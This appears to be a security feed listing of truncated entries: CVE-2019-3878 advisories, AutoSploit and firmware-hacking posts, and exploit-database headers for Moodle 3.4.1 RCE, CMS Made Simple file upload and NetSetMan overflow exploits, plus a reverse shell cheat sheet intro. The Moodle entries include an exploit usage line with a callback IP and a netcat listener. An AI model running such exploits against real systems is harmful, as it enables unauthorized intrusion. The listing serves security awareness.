DEBIAN-CVE-2019-3878

A vulnerability was found in modauthmellon before v0.14.2. If Apache is configured as a reverse proxy and modauthmellon is configured to only let through authenticated users with the require valid-user directive, adding special HTTP headers that are normally used to start the special SAML ECP...

CVE-2019-3878

A vulnerability was found in modauthmellon before v0.14.2. If Apache is configured as a reverse proxy and modauthmellon is configured to only let through authenticated users with the require valid-user directive, adding special HTTP headers that are normally used to start the special SAML ECP...

CVE-2019-3878

The CVE-2019-3878 issue affects mod_auth_mellon for Apache before v0.14.2. When Apache runs as a reverse proxy and mod_auth_mellon is set to require valid-user, an attacker can bypass authentication by sending specific HTTP headers used in SAML ECP (non-browser) flows. The connected advisories in...

UPDATE: AutoSploit 3.0 – The New Year’s edition

PenTestIT RSS Feed I wrote about AutoSploit in a post titled AutoSploit = Shodan/Censys/Zoomeye + Metasploit and it's subsequent update to AutoSploit 2.2. Recently, AutoSploit 3.0 was released. This post tries to describe the changes between the last release and the newest version as this release...

Hacking microcontroller firmware through a USB

In this article, I want to demonstrate extracting the firmware from a secure USB device running on the Cortex M0. Who hacks video game consoles? The manufacture of counterfeit and unlicensed products is widespread in the world of video game consoles. It's a multi-billion dollar industry in which...

CVE-2019-3878

A vulnerability was found in modauthmellon before v0.14.2. If Apache is configured as a reverse proxy and modauthmellon is configured to only let through authenticated users with the require valid-user directive, adding special HTTP headers that are normally used to start the special SAML ECP...

UBUNTU-CVE-2019-3878

A vulnerability was found in modauthmellon before v0.14.2. If Apache is configured as a reverse proxy and modauthmellon is configured to only let through authenticated users with the require valid-user directive, adding special HTTP headers that are normally used to start the special SAML ECP...

Moodle 3.4.1 - Remote Code Execution

Moodle 3.4.1 - Remote Code Execution php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure...

Moodle 3.4.1 - Remote Code Execution Exploit

Exploit for php platform in category web applications php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the...

CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload

CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload !/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org...

CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload

!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtim...

SQL injection vulnerability in joomla! Boo*** component rev*** function

joomla! is an open source content management system CMS. A SQL injection vulnerability exists in the joomla! Boo component rev function. The vulnerability allows attackers to obtain sensitive information about the database...

Moodle 3.4.1 Remote Code Execution

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure you're running a netcat listener on the...

CMS Made Simple Showtime2 3.6.2 Arbitrary File Upload

!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtim...

NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode) Exploit

Exploit for windows platform in category local exploits Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow SEH Unicode Exploit Author: Devin Casadey Vendor Homepage: https://www.netsetman.com/ Software Link: https://www.netsetman.com/netsetman.exe Tested Version: 4.7.1 Tested on: Windows XP S...

NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)

NetSetMan 4.7.1 - Local Buffer Overflow SEH Unicode Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow SEH Unicode Exploit Author: Devin Casadey Discovery Date: 2019-03-11 Vendor Homepage: https://www.netsetman.com/ Software Link: https://www.netsetman.com/netsetman.exe Tested Version: 4.7.1...

NetSetMan 4.7.1 Buffer Overflow

Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow SEH Unicode Exploit Author: Devin Casadey Discovery Date: 2019-03-11 Vendor Homepage: https://www.netsetman.com/ Software Link: https://www.netsetman.com/netsetman.exe Tested Version: 4.7.1 Tested on: Windows XP SP3...

Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a...

50m-ctf: `Cody trolled us all` h1-702 CTF write-up

Premise I use not to play CTF challenges because they usually absorb me entirely. I cannot think of anything else but "I want that flag!". That said, this is going to be a long story: no princess, no dragoons, only a tweet. https://twitter.com/Hacker0x01/status/1100543680383832065 Level 0 - Nothi...

This Week in Security News: IoT Threats and Risks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the threats and risks to complex IoT environments. Also, learn about new security challenges and risks the food production...